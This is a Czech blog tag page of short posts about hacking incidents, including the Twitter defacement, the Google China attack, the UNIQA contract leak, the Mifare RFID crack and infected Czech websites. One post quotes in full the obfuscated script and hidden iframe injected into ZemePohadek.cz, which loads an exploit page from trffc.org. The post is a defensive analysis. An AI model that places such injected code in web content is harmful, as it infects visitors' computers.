Pravidelný občasník originálního humoru

Štítek: Hack RSS

Sociální inženýrství v praxi - Tweet Cloud

Na tenhle příklad je dobré se kouknout, je poměrně dost chytrý. Otázka je, jestli se někdy dozvíme, kolik hloupých uživatelů Twitteru dobrovolně odevzdalo svojí e-mail adresu (mimo jiné první krok k hacknutí Twitter účtu).

Apple iTunes "hacknutý" stejně jako možná právě váš iTunes účet

Jakkoliv zpočátku problém vypadal jako ojedinělý případ vývojáře využívajícího hacknuté účty k nákupu vlastní aplikace, skutečnost je jiná. Daleko horší. Nejhlídanější obchod na světě je plný aplikací sloužících ke krádežím účtů. A pro Steva Jobse je důležitější chránit před pornem než před krádeží peněz z účtů

HTML Injection na YouTube.com - velký malér a ještě větší ostuda

Jedno je důležité, ignorujte média tvrdící něco o tom, že YouTube.com bylo hacknuto. Co je ale důležitější, pokud YouTube.com aktuálně používáte, můžete být hacknuti vy. HTML Injection totiž umožňuje do komentářů vkládat skripty a to je právě to, co se na YouTube včera dělo.

Google zvažuje odchod z Číny a odmítá cenzorovat výsledky hledání (Firemní síť Google hacknuta)

Na Google blogu se objevil text A New approach to China. Píše se v něm o tom, že Google v polovině prosince zjistil cílený a  promyšlený útok na firemní infrastrukturu z Číny, který vedl ke krádeži duševního vlastnictví. Jinými slovy, Google hackli firemní síť, dostali se dovnitř a odtamtud něco získali. Google k tomu dodává, že podobný útok byl vedený i na dalších minimálně dvacet velkých společností. A upozorňuje, že  hlavním cílem útoku bylo získat přístup ke Gmail účtům činských aktivistů bojujících za lidská práva. A dodává, že věří tomu, že se útočníkům tyto informace nepodařilo získat. Je to zajímavé a poučné čtení a Google přidává i některé další informace, které mohou být užitečné pro kohokoliv, kdo se pohybuje v oblasti počítačové bezpečnosti.

Co je ale ještě zajímavější je, že Google v textu píše, že "rozhodli jsme se, už nejsme ochotni pokračovat v cenzuře výsledků na Google.cn".  A chystá se jednání s činskou vládou o tom, jak je možné toto zajistit. Pokud by to nešlo, je velmi pravděpodobné, že by Google z Číny odešel. 

Twitter Hacked, Defaced By “Iranian Cyber Army” (Developing)

We’ve received multiple tips right around 10 pm that Twitter was hacked and defaced with the message below. The site is currently offline. We’re looking into this and waiting on a response from Twitter.

The message reads:

Iranian Cyber Army

THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY

iRANiAN.CYBER.ARMY@GMAIL.COM

U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don’t, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To….

NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA?
WE PUSH THEM IN EMBARGO LIST ;)
Take Care.

Staňte se administrátory opuštěných skupin na Facebooku

Důležitější ale je - pokud spravujete skupiny nebo stránky na Facebooku - nikdy nemějte jenom jednoho správce. Je to velmi nebezpečné pro budoucnost jakékoliv skupiny či stránky. Více na konci článku.

Smlouvy pojišťovny UNIQA k dispozici na webu

"Zdar panackove a panenky, Mel jsem hezke prazdniny a ted je cas zacit pracovat. Tady najdete seznam par tisic smluv pojistovny Uniqua, tedy presneji jejich zakazniky spolu s rodnym cislem a telefonem. Jestli si chcete prohlednout celou smlouvu, jdete sem https://cesty.uniqa.cz/dodatecnytisk.aspx" - doslovná citace z http://www.fotoportret.sk/to.html, kde jsou momentálně i další informace. Například o tom kde můžete získat kompletní seznam všech smluv a také kompletní texty všech smluv. 

 

Zmíněná adresa na Uniqa.cz skutečně umožňuje "dodatečný tisk smlouvy" zadáním čísla smlouvy a rodného čísla pojistníka. Dokonalá ukázka (pardon) idiocie, protože něco takového doslova volá po jednoduchém skriptu, který bude postupně dosazovat všechna možná čísla smluv a generovat k nim rodná čísla. Dokud se netrefí.

Dodatek o den později -

Na fotoportret.sk už nic nenajdete, stejně tajk jako Uniqa zrušila "cesty.uniqa.cz" (pro jistotu tam neběží ani webový server). A pokud chcete vidět dokonalou ukázku totálního mimoňst ví, tak zde:

"Pojišťovna se o úniku dat dozvěděla až od médií. Podle mluvčí Uniqy Evy Svobodové považuje pojišťovna informaci za velmi závažnou. "Tak to nám to asi někdo fakt napadl. Samozřejmě musím začít interně ihned jednat, aby se to napravilo," řekla Svobodová." (viz článek na iDnes)

Hack: Ahyde.blog.cz

 

Blogy přicházejí, odcházejí. A také bývají hacknuté. Byť v tomto konkrétním případě jde o specifickou kategorii zvanou "defacement" - získání přístupu k něčímu webu či blogu slouží k (teoreticky) sdělení nějakého nesmírně důležitého vyjádření.

V ahyde.blog.cz se toho samozřejmě moc nedozvíte, pokud, což je taky možné, to nakonec není sám Ahyde, kdo se dal na pravou víru (Hacked by TNCAkadroS tak jako tak neříká o nic víc) .

 

Nejvyšší registrátor domén přišel o vlastní doménu

Docela zábavná záležitost, ICANN (Internet Corporation for Assigned Names and Numbers) se podařilo na krátkou dobu přijít o vlastní doménu (icann.com) a ještě doménu své divize Internet Assigned Numbers Authority (iana.com). Ke ztrátě došlo klasický způsobem, falešným požadavkem na převod domény u jednoho z registrátorů domén.

Převod se podařilo během zhruba 20 minut vrátit zpět, ale změny v DNS pochopitelně mezitím prošly do všech koutů a nějakou chvíli m ůže trvat, než se vše vrátí do "správného" stavu. ICANN/IANA používají .com domény jenom k přesměrování na .org verze - těch se útok netýkal. ICANN na svém webu slibuje, že se z útoku poučí a zajistí, že se podobné útoky nebudou moci již opakovat.

www.kisswow.com.cn/m.js aneb SvětSítí.cz vám může hacknout počítač

Další v článku jmenovaný virus/malware najdete i na dalších českých stránkách - je mezi nimi i pár známých jmen - Strabag, Alza či SPŠ Zlín

Vista padla za oběť hackerovi, Ubuntu Linux vydržel

Největším nebezpečím pro dnešní počítače jsou vedle jejich vlastních uživatelů hlavně plug-in v prohlížečích. Píšu o tom v dnešním článku Obchod s kradenými osobními údaji jen kvete na Lupě.  A ejhle, kritická chyba v Adobe Flash přehrávači napomohla tomu, že hackerská soutěž PWN To OWN má dalšího vítěze, Windows Vistas Ultimate je prostě Onwed. A jediné co zůstalo nehacknuté je Ubuntu Linux.

Hacknout se podařilo i MacBookAir s pomocí chyby v Safari prohlížeči. Podle informací o soutěží je chyba ve Flash playeru prozatím neopravená ...

RFID karty Mifare Classic hacknuty, problémy mohou být i v ČR

O tom jak může být RFID nebezpečné jsem v minulosti psal již několikrát, největší článek vyšel  jižv září 2004 v Softwarových novinách (RFID aneb Svět ve kterém víte všechno o všech a všem). Americký PC World čersvtvě upozorňuje na velmi závažný problém s Mifare Classic RFID čipy - jejich zabezpečení bylo rozlousknuto a bez jakýchkoliv problémů je možné tuto technologii, používanou ve více než 800 milionech digitálních přístupových i platebních kartách po celém světe, zneužívat. Zejména tak, že je možné vytvořit klon libovolné karty. Což může znamenat výrazné narušení  bezpečnosti budov, které využívají RFID přístupové karty. A stejně nebezpečí hrozí i tam, kde jsou RFID karty používany jako elektronická peneženka či předplatní karty.

Mifare Classic je používáno ve významné míře i v České republice. Letmé využití Google umožňuje získat základní představu - podle dostupných informací slouží podobné karty jako Modré karty pro České dráhy (dodatek, České Dráhy přešly na pokročilejší DESfire model, kterého se problém netýká, takže dobrá zpráva), používají je autobusoví dopravci (například Veolia, MHD Liberec, atd), nasazeny jsou i na pražském magistrátě. A tatáž technologie bude použita v tzv. Open card systému, který pražský magistrát plánuje plošně nasadit po celé Praze a použít i například jako parkovací a předplatné karty.

Hack tuhle, hack támhle, hack kam se podíváš

Hacked : www.ivz.cz/i-divadloJe to tak, hacknutých stránek najdete na českém Internetu dostatek. Stačí použít vyhledávač a ejhle, začnou se sypat jedna po druhé.

Hacked : Gimp.czNěkteré jsou hacknuté opravdů "důkladně", co třeba takový www.gimp.cz , který sice píše něco jako "Omluvte dočasnou nedostupnost", ale ve skutečnost má přístupné všechny stránky uvnitř, včetně dodatku tam umístěného neznámým "dobrodincem" (screenshot vpravo).

Pár dalších screenshotů přidávám, z jejich popisků zjistíte, že mezi hacknutými je leccos (třeba i Politikon.com). Dalo by se jich vyrobit desítky. Třeba z řady webů herních klanů, které jsou postižené opravdu hodně. Nebo možná i stovky - vynechal jsem totiž velké množství diskusních fór, do kterých je stále možné vkládat kompletní HTML kód a tak se mohou pyšnit opravdu závratným množstvím "hacků" (hodně polovičatých).

Zábavný je například hacknutí www.sluzbyasp.cz, jeho hlavní stránka je netknutá a informuje o ukončení činnost. ale uvnitř (screenshot) se to hemží "hacked". 

Hacked : Kastelan.cz Hacked : www.chroniclers.goo.cz

Upozornění - než na někeré z hacknutých webů vstoupíte, měli byste vědět, že tam můžete narazit na nějaké to malware. I k tomu totiž podobné aktivity slouží.

Hacked : Media.Politikon.cz Hacked : UkFashion.cz   

Yahoo hackli CAPTCHA

Nepříjemná novina, týmu ruských hackerů se podařilo prolomit CAPTCHA používanou Yahoo!, která prozměnu všeobecně byla uznávaná jako jedna z nejtěžších. V Yahoo! CAPTCHA Cracked je odkaz na RapidShare soubor užitečný těm, kdo chtějí vídět jak to je vlastně uděláno.

V některých médiích se objevuje, že sice jde o hack, ale má jenom 35% šanci na úspěšnost. K tomu je nutné dodat, že to vůbec nic nemění na tom, jak závažné to je. 35% úspěšnost znamená, že v průměru každý 3 pokus (a ještě o něco více) uspěje. A pokud autoři spamu (poštovního či komentářového) prostě zkusí stovku tisíc pokusů za jeden den, tak prostě uspějí ve více jak 35 000 případech. A výpočetní výkon k tomu použitý je nebude stáv vůbec nic.

CAPTCHA je přitom pro (nejenom) Yahoo! jedním ze způsobů jak se například bránit tomu, aby si spammeři hromadně zakládali e-mailové schránky či zprovozňovali webové stránky plné škodlivého obsahu. Pokud je nutné zapojit do podobných aktivit lidský element, už se zpravidla nevyplatí.

O prolomitelnosti Yahoo! CAPTCHA se hovořilo již poměrně dlouho. Podle některých zdrojů řešení již existovalo "in the wild", neboli někde na spammerské/hackerské scéně. Popisované řešení s 35% úspěšností je nové, vytvořené právě jako reakce na domněnky, že někdo již podobné řešení má (a pochopitelně i používá).

Web prestižního titulu BusinessWeek.com šířil virus

Virus se šíří (a šířil) i z českých stránek - historický výskyt lze snadno nalézt v Google. Zajímavé je i to, že jde s největší pravděpodobností o kompromitaci prostřednictvím SQL Injection

Proč ZemePohadek.cz stále obsahuje kód viru? A proč je tomu tak u dalších webů?

Princip je velice jednoduchý. Robot prohledává internet a snaží se dostat k souborům webových serverů. Prolomení hesla do FTP poslouží dokonale, protože potom už stačí pouze změnit HTM/HTML dokumenty.

Proč je ZemePohadek.cz blokovaná Google

Na včerejším vyhlašování Křišťálové Lupy se řešilo i to, proč je www.zemepohadek.cz v Google označována jako web, který může poškodit váš počítač. Taťána Le Moigne, které tenhle web patří, ředitelka českého Google, nevěděla proč, dokonce tam padaly vysvětlení v podobě chyby Google.

Ona to žádná chyba nebude. ZemePohadek.cz je hacknutý web, na který někdo umístil škodlivý kód, který se pomocí exploitů snaží hacknout počítače všech návštěvníků. Je to vcelku prosté a stačí se podívat na konec kódu stránek tohoto webu. Najdete tam toto:

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>

Asi dost jasně tušíte, že to tam nemá co dělat :) Případné podrobnosti viz například zde. Výsledný script (IFRAME) směřuje na doménu trffc.org, podle Google snadno zjistíte, že je poněkud profláklá.

<iframe width="0" height="0" style="display: none;" src="http://trffc.org/in.cgi?default">

Případně viz též MalwareDomainList. Trffc.org je v současné době (naštěstí) poněkud mimo provoz.

Botnet může znamenat až 60 let vězení

Pod svícnem bývá tma. "Botmaster" pracoval jako konzultant v oblasti počítačové bezpečnosti

Stránky Alicia Keys na MySpace hacknuty

Zajímavé řešení, obrázek na pozadí s odkazem. Pochopitelně ten obrázek má velký rozměr, takže pokrývá většinu stránky (konkrétní příklad uvnitř).


<<< Novější články ( strana 2 z 2 ) ( celkem článků: 49)